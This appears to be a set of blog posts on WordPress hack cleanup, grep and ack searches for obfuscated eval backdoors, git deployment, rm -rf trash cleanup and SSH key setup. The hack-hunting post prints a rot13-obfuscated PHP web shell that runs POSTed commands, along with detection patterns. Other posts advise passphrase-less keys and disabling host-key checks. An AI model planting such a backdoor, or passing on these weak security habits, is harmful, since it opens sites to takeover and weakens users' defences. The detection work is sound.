I’m a huge fan of the scorched-earth cleanup for WordPress. By which I mean when I clean up WP, I rip it out, scrub it, and reinstall. This scares the heck out of people sometimes, and if you’re doing it in a GUI, yeah, it can be sucky and time-consuming. Me? I do it in 5-10 minutes, depending on whether my cat wants to be petted.
I’ve been asked ‘How do you do it that fast?’ so here are my steps for cleaning up WP, with the following assumptions:
I’m working in the folder where WP is installed
wp-config.php is in this folder
WP is in ‘root’ (i.e. I’m not giving WP its own folder)
If any of those aren’t true for you, adjust the folder locations in the commands:
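Back up the database. With WP-CLI, that’s a one-liner along these lines:
wp db export domain_com.sql   # or whatever filename you like; mine matches the mysqldump example below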
Pause. Here I’m using WP CLI, which makes my life way easier. If you’re not, you’ll need something like this: mysqldump --opt --user=username --password=password --host=yourMySQLHostname dbname > domain_com.sql
Zip up the files I want to back up: zip -r ../domain.zip *.sql wp-config.php .htaccess wp-content/
Set glob. Glob is scary, I know, but read about glob before you dismiss it (if you’re on ksh, you can usually skip this): shopt -s extglob
Delete files: rm -rf !(wp-config.php|wp-content)
Pause. At this point, it’s probably wise to consider that my hack may be in my theme and/or plugins. If so, I want to nuke them and JUST keep my uploaded files, so I use this instead…
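Something along these lines (a sketch; the extglob from the step above still applies):
rm -rf !(wp-config.php|wp-content)
cd wp-content && rm -rf !(uploads) && cd ..   # keep only uploads; themes, plugins, and mu-plugins come back fresh later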
Pause again. No matter what, I want to scan for evil files, but this way I do it over a much smaller group of them. Either way, I do want to scan the folder for evil, because leaving behind hacks in themes and plugins is really common. It’s also a good idea to delete every plugin you don’t use, and every theme as well. Since you really can’t delete all themes but one on a Multisite, this gets harder. Generally I don’t delete the themes automatically, but instead go in and nuke them one at a time, so I run this…
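Something in this spirit (a sketch, not gospel):
find wp-content/uploads -name "*.php"          # PHP has no business living in uploads
grep -rE "base64_decode|eval\(" wp-content/    # the usual suspects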
Now we can move on, knowing our personal files are clean.
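Grab a fresh copy of WordPress in the parent folder, something like this, so the paths in the next two commands line up:
wget https://wordpress.org/latest.zip -P ..   # drop the zip next door
unzip ../latest.zip -d ..                     # unpacks into ../wordpress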
Copy it back: cp -r ../wordpress/* .
Clean it up: rm -rf ../wordpress ../latest.zip
And now you’re done! When I want to reinstall plugins and themes, I do it via wp-cli because it’s faster: wp plugin install NAME and wp theme install NAME
Then I activate as needed and I’m off to the races. If I deleted my mu-plugins, I copy those back from my backup zip, one at a time, checking each file for hacks.
The best thing about this is you can apply the logic to any CMS out there. Just know what you have to delete and keep. The downside? It doesn’t touch your database. Rarely is this an issue for me, except in the case of the Pharma hack. I’ve not had a DB infected yet.
Do you have a solid methodology for cleaning it up?
One of the things I do at DreamHost is help with hacked sites. This means when WP is hacked, I look at it, figure out how, and explain to the person how to fix it, or how to tell their tech folks what needs doing. There are occasions where I’ll delete things for them, but usually that happens when there’s a folder or file with weird permissions.
We have a lot of tricks with what we look for, like base64, but recently I started to find files that slipped past my scan, though not past my “Hey, wait, wp-mai1.php isn’t a WordPress file…” check. Files like this:
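(I won’t reprint the actual file, but the pattern looks roughly like this; rot13 of ‘eval’ is ‘riny’:)
<?php eval(str_rot13('riny(onfr64_qrpbqr($_CBFG["pzq"]));')); // hypothetical reconstruction, not an actual capture ?>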
Now obviously I can just add str_rot13 to my checklist (nothing in WordPress core uses it), but… how do I look for those eval strings?
Eval is a funny thing. In JavaScript: The Good Parts, Douglas Crockford states “eval is Evil: The eval function is the most misused feature of JavaScript. Avoid it.” But he’s talking about JS, and I’m looking at PHP files. So with the (current) assumption that I can ignore JS, I can try this (I also use ack for this half the time, depending on my mood; you can leave out the ‘exclude SVN’ stuff if you want to, since most users don’t have it):
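grep -r "eval" . --include="*.php" --exclude-dir=".svn"   # give or take the exact flags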
That gets me a lot of files, though, and I don’t want to parse what I don’t need to. By the way, there’s one and only one file in all of WP that uses eval() in a ‘nefarious’ way, and that’s ./wp-admin/js/revisions-js.php, which is the WordPress easter egg. That’s also the only place you’ll see p,a,c,k,e,r code. But clearly I want to look for eval( or even eval($ because that’s more exact, and that should give me a better result.
This is a double-edged sword, of course. If I’m too precise, I’ll miss some of their shenanigans. If I’m not close enough to what I’m looking for, I get too much. And worst of all, I don’t always know what I’m looking for. Quite a lot of finding new hacks lives in “I’ll know it when I see it” territory. So let’s narrow it down and say I want no JS, nothing in .svn, and anything with eval and a paren:
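The same grep, tightened to eval-plus-a-paren and piped through cut (more or less):
grep -r "eval(" . --include="*.php" --exclude-dir=".svn" | cut -c 1-80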
Now I’m telling it to cut up after 80 characters, because it’s easier to pick out the bad with just that much. Look:
./foo.php:eval($a51a0e6bb0e53a($a51a0e6bb0e5e4('eF6dWFtv6kYQ/it9qMQ5UlWBCVGtKg+J
./foo.php:eval($a51a0e6bb0e53a($a51a0e6bb0e5e4('eF7tW1uvotqW/ivnYSe1d85JignSvcxJ
./wp-admin/includes/class-pclzip.php:// eval('$v_result = '.$p_options[PCLZ
./wp-admin/js/revisions-js.php:eval(function(p,a,c,k,e,r){e=function(c){return(c
./wp-admin/press-this.php: var my_src = eval(
./wp-admin/press-this.php: var my_src = eval(
./wp-admin/press-this.php: eval(data);
./wp-includes/class-json.php: * Javascript, and can be directly eval()'ed with n
./wp-includes/functions.php: if ( doubleval($bytes) >= $mag )
Part of the reason this works is I know what I’m looking for. WordPress, in general, doesn’t encrypt content. Passwords and security stuff, yes, but when it does that, it uses variables so you would get eval('$v_result = '.$p_options[PCLZIP_CB_PRE_EXTRACT].'(PCLZIP_CB_PRE_EXTRACT, $v_local_header);');, which remains totally human readable. By that I mean I can see clear words that are easy to search for in a doc, or via grep or awk without being forced to copy/paste. I can remember “PCLZIP underscore CB…”
Those random characters are not human readable at all. That’s how I know they’re bad. Of course, if someone got clever-er, they would start naming those variables things that ‘make sense’ in the world of WP, and I have a constant fear that by pointing out how I can tell this is a hack, I give them ideas on how to do evil-er things to us.
It’s for reasons like this that I, when faced with a hack or asked to clean one up, always perform Scorched Earth Security. I delete everything and reinstall it. I look for PHP and JS files in wp-content/uploads, or .htaccess files anywhere they shouldn’t be (in clean WP, you have two at most: at the root of your site and in akismet). I make sure I download my themes and plugins from known clean locations. I’m careful. And I always change my passwords. Heck, I don’t even know what mine are right now!
But none of this is static enough for me to say “This is the fix forever and ever” or “this is how you will always find the evil…” By the time we’ve codified and discussed best methods, the hackers have moved on. The logic of what to look for now may not last long, but the basic concept of looking for wrong and how to search for it should remain a good starting point for a while yet.
Do you have special tricks you use to find the evil? Like what Topher did to clean up a hack?
I’ve been banging my head on this for a while. It really did take me a year and reading lots of things to begin to understand that I was totally wrong. As with many things, I have to sit down and use them for a while to understand what I’m doing wrong, and what I need to learn. I finally had my git breakthrough. It’s very possible (no, likely) that I got some of this wrong, but I feel like I now understand more about git and how it should be used, and that made me more confident in what I’m doing with it.
Speaking as a non-developer (hey, sometimes I am!), I just want a command line upgrade for my stuff. This code also lacks a WordPress-esque click-to-upgrade, so I have to do a four-step tango of download, unpack, copy, delete in order to upgrade. (By the way, more software should have one-click upgrades like that; it would make life easier for everyone. I do know that the backend support is non-trivial, so I would love to see a third party act as a deployment hub, much like GitHub is a repository hub.) The more steps I have, the more apt I am to make an error. So in the interest of reducing my errors and my overhead, I wanted to find a faster and safer way to deploy. (My previous job was all about deployment. We had a lot of complicated scripts to take our code, compile it, compress it, move it to a staging site, and then email that it was ready. From there, we had more scripts to ‘move to test’ and ‘move to prod,’ which made sense.)
Since I already think that automating and simplifying deployment is good, all I want to do is get one version, the ‘good’ version, of the code and be able to easily update it. One or two lines is best. Simple, reliable, and easy to use. That’s what I want.
Recently, Ryan Hellyer pointed out git archive, which he claims is faster than clone. I’d believe it if I could get it to work. When I tried using HTTPS, I got fatal: Operation not supported by protocol. So I tried using SSH and got Could not resolve hostname… instead. Basically I had all these problems. Turns out GitHub turned off git archive --remote, so I’m dead in the water there for any code hosted there, which is most of my code.
I kicked various permutations of this around for a couple of afternoons before finally throwing my hands up, yet again, and looking into something else, including Capistrano, which Mark Jaquith uses in WP Stack. It’s something I’m personally interested in for work-related reasons. Capistrano is a Ruby app, and vulnerability fears aside, it’s not very user friendly. At my old job we used Ant a lot to deploy, though there don’t seem to be Ant tasks for Git yet. The problem with both of those is that they require you to pull down the whole hunk o’ code, which is what I’m trying to avoid in this use case. Keep it simple, stupid. Adding more layers of code and complication onto a project that doesn’t need it is bad.
Finally I went back to git and re-read how the whole distributed deployment works. I know how to clone a repository, which essentially gets me ‘trunk.’ And I know that a pull does a fetch followed by a merge, in case I’d done any edits, and it saves my edits. Hence merge, and why I dig it for dev. At length it occurred to me that what I wanted was to check out the git repo without downloading the code at first. Well, I know how to do that:
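Something like this (using wp-cli as the example, which matches the tags below):
git clone --no-hardlinks --no-checkout https://github.com/wp-cli/wp-cli.git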
That brings down just a .git folder, which is small. And from there, I know how to get a list of tags:
$ git tag -l
v0.3.0
[...]
v0.8.0
v0.9.0
And now I can check out version 0.8.0!
$ git checkout v0.8.0
Note: checking out 'v0.8.0'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:
git checkout -b new_branch_name
HEAD is now at 8acc57d... set version to 0.8.0
Well damn it, that was simple. But I don’t want to be in a detached HEAD state, as that makes it a little weird to update. I mean, I could do it with a switch back to master, a pull, and a checkout again, but then I thought about local branches. Even though I’m never making changes to core code (ever), let’s be smart. One codebase I use has the master branch as their current version, which is cool. Then there’s a 1.4.5 branch where they’re working on everything new, so when a new version comes out, I can git pull and be done. (In this moment, I kind of started to get how you should be using git. In SVN, trunk is where you develop, and (for WordPress at least) you copy finished versions into tags. In git, you make your own branch, develop there, and merge back into master when you’re ready to release. Commence head-desking.)
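Spelled out, that workflow is just a few commands (a minimal sketch, with made-up branch names):
git checkout -b my-feature       # develop on your own branch
git commit -am "Do the thing"    # commit as you go
git checkout master              # when it's release-ready...
git merge my-feature             # ...merge back into master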
One conundrum was that there are tags and branches, and people use them as they see fit. While some of the code I use defines branches so I can check out a branch, others just use tags, which are tree-ish. Thankfully, you can make your own branch off a tag, which is what I did.
I tried it again with a non-GitHub slice of code: MediaWiki. (MediaWiki, compared to wp-cli, is huge, and took a while to run on my laptop. It was a lot faster on my server. 419,236 objects vs. 10,464. I’m just saying someone needs to rethink the whole ‘Clone is faster!’ argument, since it’s slow now, or slow later, when downloading large files. Large files is large.) Now we have a new issue. MediaWiki’s .git folder is 228.96 MiB… Interestingly, my MediaWiki install is about 155 MiB in and of itself, and disk space is cheap. If it’s not, you’ve got the wrong host. Still, it’s a drawback and I’m not really fond of it. Running repack makes it a little smaller. Running garbage collection made it way smaller, but it’s not recommended. This, however, is recommended:
git repack -a -d --depth=1 --window=1
It doesn’t make it super small, but hey, it worked.
Speaking of worked, since the whole process worked twice, I decided to move one of my installs (after making a backup!) over to this new workflow. This was a little odd, but for MediaWiki it went like this:
git clone --no-hardlinks --no-checkout https://gerrit.wikimedia.org/r/p/mediawiki/core.git wiki2
mv wiki2/.git wiki/
rmdir wiki2
cd wiki
git reset --hard HEAD
Now we’re cloning the repo without checking anything out, moving the .git folder into our existing install, and resetting the working tree to match HEAD. With that done, I’m ready to set up my install to use the latest tag, and this time I’m going to make a branch (mysite-1.20.3) based on the tag (1.20.3):
git checkout -b mysite-1.20.3 1.20.3
And this works great.
The drawback to pulling a specific tag is that when I want to update to a new tag (1.20.4, let’s say), I have to fetch everything and then check out the new tag in order to pull down the files. Now, unlike SVN, I’m not making a full copy of my base code with every branch or tag; it’s all handled by refs, so there’s no harm in keeping these older versions. If I want to delete one, it’s a simple git branch -D mysite-1.20.3 call and I’m done. No code changes (save themes and .htaccess), no merging needed. And if there’s a problem, I can switch back really fast to the old version with git checkout mysite-1.20.3. The annoyance is that I just want to stay on the 1.20 branch, don’t I? Update the minors as they come, just like the WP minor-release updater only updates changed files.
Thus, I asked myself if there was a better way and, in the case of MediaWiki, there is! In the world of doing_it_right(), MediaWiki has branches and tags (so does WP, if you look at Trac), and they use branches called ‘REL’. If you’re not sure what branches your repo uses, type git remote show origin and it will list everything. There I see REL1_20, and since I’m using version 1.20.3 here, I surmised that I can actually do this instead:
git checkout -b mysite-REL1_20 origin/REL1_20
This checks out my branch and says “this branch follows along with REL1_20,” so when I want to update my branch, it’s two commands:
git fetch --all
git pull
The fetch downloads the changesets and the pull applies them. It looks like this in the real world (where I’m using REL1_21, since I wanted to test some functionality on the alpha version):
This doesn’t work on all the repos, as not everyone follows the same code practices. Like one repo I use only uses tags. Still, it’s enough to get me fumbling through to success in a way that doesn’t terrify me, since it’s easy to flip back and forth between versions.
Fine. I’m sold. git’s becoming a badass. The only thing left is to protect myself with .htaccess:
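The usual trick (one common approach, anyway; adjust for your own server) is a one-liner in the root .htaccess:
# keep the web away from the .git folder
RedirectMatch 404 /\.git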
And to figure out how to get unrelated instances of git in subfolders to all update (MediaWiki lets you install extensions via git, but then you don’t have a fast/easy way to update them…):
#!/bin/sh
# Loop through every immediate subfolder and pull the latest for each.
for i in $(find . -maxdepth 1 -mindepth 1 -type d); do
	cd "$i" || continue
	git pull
	cd ..
done
And I call that via ./git.sh which lives in /wiki/extensions and works great.
From here out, if I wanted to script things, it’s pretty trivial, since it’s a series of simple if/else checks, and I’m off to the races. I still wish every app had a WordPress-esque updater (and plugin installer, hello!) but I feel confident now that I can use git to get to where my own updates are faster.
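For instance, a skeleton like this (hypothetical paths, nothing fancy):
#!/bin/sh
# Only pull when the branch is actually behind its upstream.
cd /home/me/wiki || exit 1
git fetch --all
if git status -sb | grep -q behind; then
	git pull
else
	echo "Already current."
fi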
I do a lot of things by command line. Still. It’s faster, it’s easier, and in many cases it gives me more control. And as I always mention, people who use the command line are people who are really lazy. We don’t like sixteen clicks. If we can copy/paste and change one thing, we’re happy.
For ages, when I wanted to search my local repository of plugins, I’d whip out something like this:
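grep -r "ob_start" /home/me/Development/WP-Plugin-Dir/jetpack/   # give or take the exact flags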
This works, but it’s slow and it’s not very pretty. The file output is a mess and it’s painstaking to sort through and understand.
/home/me/Development/WP-Plugin-Dir/jetpack/class.jetpack-post-images.php: ob_start(); // The slideshow shortcode handler calls wp_print_scripts and wp_print_styles... not too happy about that
/home/me/Development/WP-Plugin-Dir/jetpack/modules/comments/comments.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/contact-form/grunion-contact-form.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/custom-css/custom-css.php: ob_start('safecss_buffer');
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php: ob_start();
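The ack version of the same search is, give or take a flag:
ack ob_start /home/me/Development/WP-Plugin-Dir/jetpack/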
/home/me/Development/WP-Plugin-Dir/jetpack/class.jetpack-post-images.php:36: ob_start(); // The slideshow shortcode handler calls wp_print_scripts and wp_print_styles... not too happy about that
/home/me/Development/WP-Plugin-Dir/jetpack/modules/comments/comments.php:138: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/contact-form/grunion-contact-form.php:264: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/custom-css/custom-css.php:350: ob_start('safecss_buffer');
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php:872: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php:928: ob_start();
That’s ack, which claims to be better than grep, and I’m kind of agreeing. Let’s look at the small differences.
Line numbers. That will help me find the code later.
You can see that ack is a lot more powerful right away when it comes to being able to quickly use the data without a lot of parsing. There are some catches with ack, though, like it has a whitelist of file types that it will search, so if you don’t tell it to search .html, it won’t. That’s a small price to pay for me.
The documentation is written in nerd, so I generally find looking at concrete examples is more helpful. Do you have tricks with ack (or even grep) that save you time and money?
Warning! I’m going to talk about the ‘rm’ command, which is a super-deadly command in the Linux world. No matter what, never ever ever consider running it unless you’re certain you know what it does!
I review a lot of plugins, which means I download them all to my laptop, review all the code, possibly install them, and then delete. This means, on any given week, I have 5000 items in my trash. And this is without unzipping! (Yes, we get a lot of plugins, and TextWrangler lets me review most of them in their zips.)
When I forget to empty my trash every day, I end up waiting hours for the GUI empty to run unless I use rm -rf from inside the ~/.Trash/ folder. The real command is this:
$ rm -rf ~/.Trash/*
I like this because it’s crazy fast compared to the GUI.
But sometimes I actually just want to command-line my trash. I’ll be banging on things in Terminal, and a very simple ‘empty trash’ command would be nice, right? OSX Trash lets me type trash -l to see what’s in my trash, and trash -e to run the normal empty command. It’s better than a lot of other scripts because if I type trash filename and there’s already a file with that name in the trash, it behaves the way the Mac normally does. That is, it’ll rename my second file ‘filename date’ and I won’t have file conflicts!
The only thing it’s missing is a ‘trash -p’ command, which would let me run the force rm and just dump it all. Yes, I know rm works, but if you’ve ever typed it in the wrong window, you know why it’s a terrifying command. Still, back to the age-old rm commands: what happens when you have that annoying locked-file error? Like me, you probably kvetch about quitting everything to delete.
More command line magic!
$ cd ~/.Trash
$ chflags -R nouchg *
$ rm -rf *
Finally, to make this full circle, I made a dead-simple alias to prevent me from fat-fingering the rm too much:
alias trashdump='rm -rf ~/.Trash/*'
Fast, efficient, and potentially deadly, but less so than manually typing it in all the time. Deleted 2000 files in seconds, versus minutes.
I’m incurably lazy, and as we all know, lazy techs like to automate (ltla?).
I ssh a lot into my personal servers, and I get tired of having to type ssh account@server.com, and then enter my password. So I got smart.
Since I’m on a Mac, the first thing I did was grab iTerm2. This lets me create simple profiles so, with a click, I can log in to any of my servers. When I was using Windows, I used PuTTY and the PuTTY Connection Manager add-on. (The real PuTTY CM site is gone, and binarysludge just keeps a copy on hand for the same reasons I do. You never know when you need it. Mine’s in my Dropbox storage.)
What I really loved about PuTTY CM was that I could fill the pref file with my accounts and passwords, and then one-click connect to any of my servers. This was at the bank job, where I had a couple hundred servers to do this with, and when I had to change my password, I could search/replace that file. I know, it’s not secure. At DreamHost, I had the same, but they scripted it so I can sudo in with a handy call that I’m in love with. As long as I remember my password, I’m fine. But see, I told you, I’m horribly lazy and I hate having to log in with my password, then sudo again with my password.
The first step for this is to make an RSA key pair. This is a fancy way of telling both computers to trust each other, so on your personal computer (we’re assuming Linux here), go to your home folder and type this:
[Laptop] $ ssh-keygen -t rsa
You’ll be presented with a series of informative notes and questions. Accept all the defaults, and keep your passphrase empty.
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ipstenu/.ssh/id_rsa):
Created directory '/home/ipstenu/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/ipstenu/.ssh/id_rsa.
Your public key has been saved in /home/ipstenu/.ssh/id_rsa.pub.
The key fingerprint is:
3e:4f:05:79:3a:9f:96:7c:3b:ad:e9:58:37:bc:37:e4 ipstenu@[Laptop]
This saves your public ‘key’ in the .ssh folder (yes, it’s a folder).
Now we have to set up the server (halfelf.org, for example):
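[Laptop] $ ssh myaccount@halfelf.org mkdir -p .ssh   # the classic one-liner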
This will SSH into halfelf as ‘myaccount’ and create a folder called .ssh. You only need to do this once, so after you set up the key for one computer, you can skip this the next time.
Finally we’re going to append the public key from my laptop over to HalfElf, so it trusts me:
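[Laptop] $ cat ~/.ssh/id_rsa.pub | ssh myaccount@halfelf.org 'cat >> .ssh/authorized_keys'   # append, don't overwrite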
The reason we’re appending is so that if I decide I want to add my Work Laptop, I can just make the key, and then repeat that last command and it will add it to the bottom, trusting both.
There’s a caveat here, which caught me last week. I set everything up for my new server, ElfTest, and then moved the server to a VPS. The IP changed, so the stored host key was invalid. You see, every time you connect to a server for the first time, it asks you to trust it. If anything in that fingerprint changes, you have to re-trust it. This is annoying:
The authenticity of host 'elftest.net (111.222.333.444)' can't be established.
RSA key fingerprint is f3:cf:58:ae:71:0b:c8:04:6f:34:a3:b2:e4:1e:0c:8b.
Are you sure you want to continue connecting (yes/no)?
After you respond “yes” the host gets stored in ~/.ssh/known_hosts and you won’t get prompted the next time you connect. When it became invalid, I had to go edit that file and delete the entry for elftest (it’s partly human readable, so it wasn’t too bad).
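For what it’s worth, OpenSSH will even do that edit for you:
ssh-keygen -R elftest.net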
If you hate this as much as I do, and you feel you’re immune to man-in-the-middle attacks, there’s a nifty command:
ssh -o "StrictHostKeyChecking no" user@host
This turns off the key check. Generally speaking? Don’t do this. I’ve actually only done it once. (This was at the bank, where I was behind so many firewalls, if you’d gotten to my computer, I was in trouble anyway.)